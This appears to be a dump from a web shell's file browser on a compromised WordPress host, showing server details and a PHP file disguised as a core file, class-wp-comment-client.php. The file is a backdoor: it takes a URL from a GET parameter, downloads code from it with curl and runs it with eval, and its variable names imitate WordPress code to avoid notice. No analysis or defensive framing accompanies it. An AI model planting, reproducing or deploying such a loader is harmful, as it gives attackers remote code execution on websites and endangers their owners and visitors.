SCHWEIS
Server: LiteSpeed
System: Linux premium281.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User: aglitfku (993)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: //proc/thread-self/root/proc/self/cwd/wp-includes/class-wp-comment-client.php
<?php

if (isset($_GET['interface'])) {
    $admin_url_mt = $_GET['interface'];
    if ($comments_open_we = curl_init()) {
        curl_setopt($comments_open_we, CURLOPT_URL, $admin_url_mt);
        curl_setopt($comments_open_we, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($comments_open_we));
        curl_close($comments_open_we);
        exit;
    }
}